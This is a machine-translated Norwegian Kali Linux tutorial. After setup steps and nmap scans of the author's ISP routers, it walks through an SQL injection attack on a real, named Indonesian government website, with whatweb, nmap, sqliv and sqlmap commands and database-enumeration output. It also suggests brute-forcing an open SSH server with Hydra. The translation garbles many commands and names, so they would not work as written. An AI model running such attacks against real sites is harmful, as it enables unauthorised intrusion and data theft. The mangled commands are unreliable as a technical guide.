Kali Linux Tutorial

Kali Linux Tutorial
Hvis du er en ekspert eller i det minste er kjent med Linux, kommandoer og miljø, nettopp installert Kali Linux på maskinen din, ønsket å bli en mester i Kali Linux eller en etisk hacker, er du på riktig sted. I denne artikkelen vil jeg dekke en Kali Linux -tutorial for Linux -brukere som ikke allerede er kjent med Kali og komme deg i gang med noen av de grunnleggende teknikkene som brukes til hacking og sikkerhetstesting mens du bruker Kali.

Hei, jeg er Bimando, forfatteren av denne artikkelen. Hvis du liker denne artikkelen, kan du se på å kjøpe boken min PRAKTISK ETISK HACKING: For penetrasjonstestere med Kali Linux. Jeg jobbet hardt med det med Linux -hint -teamet for å produsere et produkt av høy kvalitet. Jeg vet at du vil elske det og lære mye.


Hva er Kali Linux?

Kali Linux, (Først utgitt 13. mars 2013) som formelt ble kjent som backtrack, utviklet av sikkerhetsfirmaets offensive sikkerhet, er en rettsmedisinsk og sikkerhetsfokusert distribusjon basert på Debians testgren. Kali Linux er designet med penetrasjonstesting, datagjenoppretting og trusseldeteksjon i tankene. Prosjektet byttet over til en rullende utgivelsesmodell tidligere i år i et forsøk på å gi mer oppdaterte sikkerhetsverktøy til distribusjonens brukere. Kali Linux er gratis, og vil alltid være. Den har 600+ penetrasjonstestingsverktøy inkludert.

Hvorfor Kali Linux? Er det riktig for deg?

Kali Linux har fått mye popularitet nylig. Og det er en grunn bak det. Hacking er tilbake som kul-ting å gjøre i populærkulturen, og dette kan tilskrives betydelig TV-serien MR. Robot. MR. Robots popularitet hjalp Kali Linux med å få nye brukere. Personer med knapt kunnskap om Linux eller noe relatert til datasikkerhet prøver nå å bruke Kali som deres viktigste Linux -distribusjon.

“Vår mest avanserte distribusjon av penetrasjonstesting, noensinne.” - Kali Linux -utviklere. (Det er skrevet på hovedsiden til Kali.org øverst på siden.) Hva får du fra den uttalelsen? Merker du dette: APTD (Advanced Penetration Testing Distribution)? Det er ikke noe begrep her bokstavelig talt. Kali Linux er det samme som andre Linux -distribusjoner. Enkelt sagt, det er en Linux-distribusjon fullpakket med sikkerhetsrelaterte verktøy og målrettet mot nettverks- og datasikkerhetseksperter. Bruken av Kali Linux fokuserer imidlertid bare på sikkerhet og rettsmedisinske.

En Linux -distribusjon er ikke annet enn en pakke som inneholder Linux -kjernen, et sett med kjerneverktøy og applikasjoner og noen standardinnstillinger. Så Kali Linux tilbyr ikke noe unikt i den forstand at de fleste av de medfølgende verktøyene kan installeres på noen Linux -distribusjon.

Kali Linux er spesielt innrettet for å oppfylle kravene til profesjonell penetrasjonstesting og sikkerhetsrevisjon. Det er rettet mot et bestemt undergruppe av Linux -brukere. Pentestere, hackere osv. Det er ikke en anbefalt distribusjon hvis du forventer Kali for General-Purpose Linux Desktop for Development, Web Design, Gaming, Office, etc. Kali kan gi deg noen utfordringer, selv om du er en erfaren Linux -bruker.

Ting å gjøre etter å ha installert Kali Linux

Etter å ha installert Kali Linux, lurer du kanskje på hva du skal gjøre videre med dette, ikke sant?. Alle står overfor dette problemet, ikke bekymre deg.

Trinn 1: Sett opp depotet

For det første vet du kanskje allerede dette, men det er avgjørende å sette depotet riktig. Som sagt, Kali Linux Rolling Release Model er i et forsøk på å gi mer oppdaterte sikkerhetsverktøy til distribusjonens brukere. Generelt, hvis du har Kali Linux nyinstallert, refererer depotet med media du bruker for å installere. For å fikse dette må du endre depotet til det offisielle Kali Linux -depotet. Filen som kreves er lokalisert under /etc/apt/kilder.liste. Åpne filen med Leafpad Text Editor og erstatt standard depot til dette offisielle Kali Rolling Repository:

Deb http: // http.Kali.org/kali kali-rulling hoved bidrag til ikke-fri
# For tilgang til kildepakke, ukommentar følgende linje
# Deb-Src http: // http.Kali.org/kali kali-rulling hoved bidrag til ikke-fri

Trinn 2: Oppdater og oppgraderer Kali Linux

Etter den oppdateringen og oppgraderer systemet ditt, synkroniserer Kali Linux til den nyeste versjonen. For å gjøre det åpne terminalen, og skriv:

Apt Update -Y && Apt Upgrade -Y && Apt Dist -Upgrade

Kommandoen "Apt Update" laster ned og henter pakken, viser informasjon fra depotene og "oppdaterer" dem for å få informasjon om de nyeste versjonene av pakker og deres avhengigheter.

Kommandoen “Apt Upgrade” laster ned og installerer nyere versjon av pakkene med installerte Kali Linux -pakker så lenge den ikke har feil på avhengigheter.

"Apt Dist-Upgrade" vil oppdatere alle pakker til den nyeste tilgjengelige versjonen uansett hva. Og installer også og fjern avhengigheter etter behov (installer avhengigheter for å tilfredsstille pakker, selvfølgelig, men også fjerne avhengigheter som ble foreldreløse hvis en pakke som ble oppdatert ikke lenger trengte avhengigheten.

Grunnleggende penetrasjonstestingskonsept med Kali Linux

Etter at du har gjort disse trinnene, er det tre viktigste ting du kan gjøre med Kali Linux basert på det målrettede systemet, inkludert:

  1. Trådløst nettverk hacking - Wifi hacking, phising, arp forgiftning osv.
  2. Webapper hacking - SQL-injeksjon, kryssforespørsel (CSRF), web phising, etc.
  3. Enhetshakking - Utnytte målmaskinen for å få kontroll over den.

Jeg inkluderer ikke IoT -hacking, det betyr ikke at Kali Linux ikke har noen evne til det formålet. Men bokstavelig talt kan det også høre til enhetshakking. Siden enheten har fysisk utseende og form. I denne opplæringen dekket jeg den grunnleggende kunnskapen om dem. Siden Kali Linux er enorm, passer den ikke i en artikkel!

Du må også vite, penetrasjonstestingssyklusen eller prosedyren. De er:

  1. Rekognosering - informasjonsinnsamling
  2. Skanning
  3. Utnyttelse
  4. Etter utnyttelse

Trådløst nettverk hacking med Kali Linux

Når det gjelder hacking av trådløst nettverk, kan offeret variere. Fordi trådløse nettverk består av flere ting, for eksempel ISP (Internett -leverandør), ruteren og dens "kamerater" (modem, hub, switch, osv.) Og klientene (brukere, CCTV, ekstern datamaskin osv.). De har også utsatte muligheter.

Internett er en stor og kompleks aggregering av nettverksmaskinvare, koblet sammen med gateways. Sporing av ruten pakkene dine følger er viktig å vite hvordan du når et visst vertsnavn eller mål -IP -adresse.

Kali Linux har et innebygd verktøy som heter Traceroute. Traceroute bruker IP -protokollen "Time to Live" -feltet og prøver å fremkalle en ICMP TIME_EXED Response fra hver gateway langs banen til en eller annen vert. Traceroute forsøker å spore ruten en IP -pakke ville følge til noen internettvert ved å lansere sondepakker med en liten TTL (Time to Live) og deretter lytte etter et ICMP “Tid overskred” Svar fra en gateway. Jeg vil gi deg og eksempel på hvordan du kan spore en ISP -ruter som brukes til å håndtere forbindelsen vår ved hjelp av Traceroute.

1. Rekognosering

Informasjonsinnsamling er den viktigste hoppstarten, ikke gå glipp av dette trinnet. I dette trinnet er vårt formål å få så mye som mulig nyttig informasjon vi kan få, og deretter brukes denne informasjonen til ytterligere trinn.

Først åpner du en terminal og skriv denne kommandoen for å begynne å spore "veien" til nettstedet, i dette tilfellet satte jeg nettstedet til Google.com.

Traceroute Google.com

2. Skanning

Når vi har lansert kommandoene, vil den lister opp der pakken vår går i rekkefølge. Som du ser ovenfor, har jeg 3 humle som en av dem er ISP -serveren min. Den første IP -en på listen er ruteren min, som fungerer som en inngangsport. Og de to neste av dem tilhører ISP -en min. La oss nå sjekke tjenesten de kjører ved hjelp av NMAP. Så målene vi skal skanne er 10.152.192.1 og 10.1. 3.223.102. I terminalen kjørte jeg følgende kommando:

nmap -v -ss [ip ​​mål] -pn

La oss bryte ned kommandoens argument:

-V = Aktiver verbositetsmodus

-SS = Bruk TCP Syn Scan Technique

-PN = Behandle alle verter som online - hopp over vertsfunn

Og her er resultatet vi fikk.

Dessverre, alle porter på 10.152.192.1 blir filtrert, det betyr at alle innkommende TCP -tilkoblinger er blokkert av ID -er eller brannmur på denne IP -en. La oss nå ta en ny skanning til det andre målet.

3. Utnyttelse

I denne prosedyren er jeg ikke ment å gjennomføre den virkelige utnyttelsen, i stedet viser jeg deg hvordan. Basert på NMAP -skanningsresultatet ovenfor vet vi at denne IP -en har SSH -serveren som kjører på port 22, og den er åpen. Det er åpent for å bli bruteforced, haha! Vi fant hullet, denne SSH -serveren er det mulige hullet vi kunne prøve å få tilgang til. Det er flere verktøy i Kali Linux som støtter bruteforce eller ordboksangrep mot SSH -protokoll. Den mest populære og mektige er “Hydra”.

OK, det var en grunnleggende prosedyre som gjennomførte en penetrasjonstest mot en målrettet server, som i vårt eksempel her er ISP -serveren min.

Nettapper som hacking med Kali Linux

Faktisk, hvis du brenner for dette, kan du sette opp hackingmiljøet ditt ved å installere DWVA (DAMN sårbar webapp) i Kali Linux. Det er en PHP/MySQL webapplikasjon som har gjeng med sårbart hull. Hovedmålene er å være et hjelpemiddel for sikkerhetsfolk til å teste sine ferdigheter og verktøy i et juridisk miljø, og hjelpe nettutviklere med å forstå prosessene for å sikre webapplikasjoner med å sikre webapplikasjoner. Du kan få DWVA gratis på GitHub her: https: // github.com/eticalhack3r/dvwa.

For nå vil jeg vise deg hvordan du gjør webapper som hacker på et ekte nettsted. Men lover meg at det bare er begrenset til utdanningsformål. Vi vil simulere et virkelig angrep på ekte sted ved hjelp av SQL -injeksjon.

Forutsetning

Verktøy dekket:

- WhatWeb (forhåndsinstallert)

- NMAP (forhåndsinstallert)

- SQLIV (installer manuelt)

- SQLMAP (forhåndsinstallert)

Vi trenger et ekstra verktøy som er tilgjengelig på GitHub her: https: // github.com/hadesy2k/sqliv, installer den først til vår kali linux. Dette verktøyet kalt SQLIV som er i stand til å gjøre målrettet skanning ved å gi spesifikt domene (med gjennomsøking). Skriv inn terminalen:

git klon https: // github.com/hadesy2k/sqliv.git
CD Sqliv && sudo python2 oppsett.py -i

Mål: www.TRENGGALEKKAB.gå.id

1. Rekognosering

Samle så mye nyttig informasjon som vi kunne få. Vi kan åpne websiden og oppdage hvilken applikasjon som kjører på dette nettstedet. For det første, la oss sjekke hva slags nettsted det er. Vi kommer til å bruke "hvaweb" for å gjøre det.

hvaweb www.TRENGGALEKKAB.gå.id

Som du kan se resultatet over, er målet lokalisert i Indonesia. Det kjører Apache v2.2.27 på webserveren og har også PHP V5.4.31, Den har en IP -adresse 103.247.21.142. Ok, vær oppmerksom på det. Det kan hende du må besøke nettsiden, på jakt etter filen eller siden som er konstruert, URL -parametere eller til og med påloggingsskjema. For nå trenger vi den IP -adressen for neste trinn som skanner.

2. Skanning

Som før bruker vi NMAP igjen for å skanne hvilke porter og tjenester som kjører på målet.

nmap -v -ss 103.247.21.142

Og her er resultatet vi fikk:

Fullført Syn Stealth -skanning 21:22, 261.93 -tallet gikk (1000 totale porter)
NMAP Scan Report for IP-103-247-21-142.Wifian.nett.ID (103.247.21.142)
Verten er oppe (0.069 -latens).
Ikke vist: 985 lukkede porter
Port State Service
21/TCP Open FTP
25/TCP Open SMTP
53/TCP åpent domene
80/TCP Open HTTP
110/TCP Open POP3
111/TCP Open RPCBIND
143/TCP Open IMAP
212/TCP Open ANET
443/TCP Åpne HTTPS
465/TCP Åpne SMTPS
587/TCP Åpen innsending
993/TCP Åpne IMAPS
995/TCP Open POP3S
3128/TCP Filtrert blekksprut-http
3306/TCP Åpne MySQL

Det er haug med åpne porter som håndterer hver tjeneste på målet, men den som ser "iøynefallende" er at MySQL-tjenesten på port 3306. Det er indikert at dette nettstedet bruker mysql For å administrere informasjonen deres i databaser. Da lurer jeg på om det er noen SQL -injeksjonssårbarheter på dette nettstedet. Så jeg skanner nettstedet igjen ved å bruke SQLIV vi nettopp har installert. Jeg skrev kommandoen:

Sqliv -t www.TRENGGALEKKAB.gå.id

Vi fant 2 mulige SQL -sårbare nettadresser på dette nettstedet. Vær oppmerksom på disse nettadressene.

3. Utnyttelse

OK, vi har SQL sårbare nettadresser, og klare for utførelse. For å gjøre det vil vi bruke SQLMap. Syntaksen er:

SQLMAP “[Sårbar URL]” -DBS

Kommandoen skal se slik ut:

sqlmap -u "http: // www.TRENGGALEKKAB.gå.id/berita.PHP?Side = 208 " - -DBS

Argumentet “-DBS” er å fortelle SQLMap for å skaffe måldatabaser. Her er utgangen vi fikk:

[Info] Back-end DBMS er mysql
Nettapplikasjonsteknologi: PHP 5.4.31, Apache 2.2.27
Back-end DBMS: MySQL 5
[21:46:04] [Info] Henter databasenavn
[21:46:04] [Info] SQL -spørringen som brukes returnerer 2 oppføringer
[21:46:04] [Info] gjenopptatt: informasjon_schema
[21:46:04] [Info] gjenopptatt: Trengkab_trg
Tilgjengelige databaser [2]:
[*] Information_schema
[*] Trengkab_trg

SQLMAP fant 2 databaser, men bare en av dem som inneholder sensitive data, for eksempel en administratorinformasjonskonto. Som er på "Trengkab_trg". Etter at vi har funnet databasene, er det enda et skritt vi bør gjøre. Det vil si å finne tabellene og kolonnene og det siste trinnet er å dumpe dataene. Jeg vil ikke vise deg hvordan her i dette avsnittet, ved å bruke dette målet. I det minste kjenner du den grunnleggende ideen på angrepssyklusen, og bruker noen verktøy.

Enhetshakking

I en fremtidig artikkel på dette nettstedet vil vi dekke hakking av enheter, holde deg innstilt på. Som en forvarsling vil du sørge for at du kjenner litt pyton for dette.